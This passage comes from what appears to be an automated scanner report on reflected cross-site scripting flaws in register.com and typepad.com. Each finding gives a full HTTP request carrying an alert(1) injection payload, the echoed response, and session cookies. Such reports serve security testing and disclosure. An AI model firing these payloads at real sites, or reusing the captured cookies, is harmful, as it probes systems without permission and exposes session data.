Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:14:19 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22798
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/domain/searchresults.rcmxc08de";alert(1)//874342fb6c6",width:400,height:400 }
</script>
...[SNIP]...

4.15. http://www.register.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8565"%3balert(1)//1bdb2705792 was submitted in the REST URL parameter 1. This input was echoed as d8565";alert(1)//1bdb2705792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icod8565"%3balert(1)//1bdb2705792 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.register.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:36:48 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22770
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/favicon.icod8565";alert(1)//1bdb2705792",width:400,height:400 }
</script>
...[SNIP]...

4.16. http://www.register.com/font/vag-bold.ttf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /font/vag-bold.ttf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41cfd"%3balert(1)//a7bdf3e7ba5 was submitted in the REST URL parameter 1. This input was echoed as 41cfd";alert(1)//a7bdf3e7ba5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /font41cfd"%3balert(1)//a7bdf3e7ba5/vag-bold.ttf HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:33:09 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22782
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/font41cfd";alert(1)//a7bdf3e7ba5/vag-bold.ttf",width:400,height:400 }
</script>
...[SNIP]...

4.17. http://www.register.com/font/vag-bold.woff [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /font/vag-bold.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d15"%3balert(1)//be090e0bf41 was submitted in the REST URL parameter 1. This input was echoed as e0d15";alert(1)//be090e0bf41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fonte0d15"%3balert(1)//be090e0bf41/vag-bold.woff HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:38 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22784
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/fonte0d15";alert(1)//be090e0bf41/vag-bold.woff",width:400,height:400 }
</script>
...[SNIP]...

4.18. http://www.register.com/images/sn/hp.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /images/sn/hp.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 593a2"%3balert(1)//40444370589 was submitted in the REST URL parameter 1. This input was echoed as 593a2";alert(1)//40444370589 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images593a2"%3balert(1)//40444370589/sn/hp.xml HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:37:36 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22780
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/images593a2";alert(1)//40444370589/sn/hp.xml",width:400,height:400 }
</script>
...[SNIP]...

4.19. http://www.register.com/js/aop-attach.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/aop-attach.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da06"%3balert(1)//439baa57256 was submitted in the REST URL parameter 1. This input was echoed as 7da06";alert(1)//439baa57256 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js7da06"%3balert(1)//439baa57256/aop-attach.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:18 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22780
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/js7da06";alert(1)//439baa57256/aop-attach.js",width:400,height:400 }
</script>
...[SNIP]...

4.20. http://www.register.com/js/homepage-optimized.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/homepage-optimized.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab187"%3balert(1)//73f4a6a9461 was submitted in the REST URL parameter 1. This input was echoed as ab187";alert(1)//73f4a6a9461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsab187"%3balert(1)//73f4a6a9461/homepage-optimized.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:35:35 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22796
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/jsab187";alert(1)//73f4a6a9461/homepage-optimized.js",width:400,height:400 }
</script>
...[SNIP]...

4.21. http://www.register.com/js/jquery-1.3.2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2708"%3balert(1)//8e023ddd2cd was submitted in the REST URL parameter 1. This input was echoed as c2708";alert(1)//8e023ddd2cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc2708"%3balert(1)//8e023ddd2cd/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:35:12 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22792
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/jsc2708";alert(1)//8e023ddd2cd/jquery-1.3.2.min.js",width:400,height:400 }
</script>
...[SNIP]...

4.22. http://www.register.com/unauthenticated_session_expired.rcmx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.register.com
Path:   /unauthenticated_session_expired.rcmx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbc4"%3balert(1)//79639f1ebd8 was submitted in the REST URL parameter 1. This input was echoed as fbbc4";alert(1)//79639f1ebd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unauthenticated_session_expired.rcmxfbbc4"%3balert(1)//79639f1ebd8?opener=/domain/searchresults.rcmx HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547; OAX=Mhd7ak5inIsACxRd; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:15:09 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22820
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
   aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/unauthenticated_session_expired.rcmxfbbc4";alert(1)//79639f1ebd8",width:400,height:400 }
</script>
...[SNIP]...

4.23. http://www.typepad.com/services/toolbar [autofollowed parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /services/toolbar

Issue detail

The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b29d9%3balert(1)//eb59c1b15d3 was submitted in the autofollowed parameter. This input was echoed as b29d9;alert(1)//eb59c1b15d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/toolbar?blog_id=6a011571d38234970b011570df1227970c&asset_id=&atype=index&to=http%3A%2F%2Fmeetupblog.meetup.com%2F&autofollowed=0b29d9%3balert(1)//eb59c1b15d3&safe_to_modify_body=0 HTTP/1.1
Host: www.typepad.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 13:13:20 GMT
Server: Apache
X-Webserver: oak-tp-app004
Cache-Control: private
Pragma: no-cache
Vary: cookie,negotiate,accept-language,Accept-Encoding
Content-Language: en
Content-Length: 14887
Content-Type: text/html; charset=utf-8
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:at="http://www.sixapart.c
...[SNIP]...
lorAnim = YAHOO.util.ColorAnim,
Easing = YAHOO.util.Easing,
Cookie = YAHOO.util.Cookie,
TPToolbar = {};

TPToolbar = {

params: {
autofollowed: 0b29d9;alert(1)//eb59c1b15d3,
blog_user_xid: '6p011571d38234970b',
display: 0,
entry_xid: '',
logged_in: 0,
safe_to_modify_body: '0',
permal
...[SNIP]...

4.24. http://www.register.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.register.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6856"-alert(1)-"f95696cf372 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=f6856"-alert(1)-"f95696cf372

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:08 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 30175
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=f6856"-alert(1)-"f95696cf372";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.25. http://www.register.com/domain/searchresults.rcmx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35db8"-alert(1)-"435739ce645 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

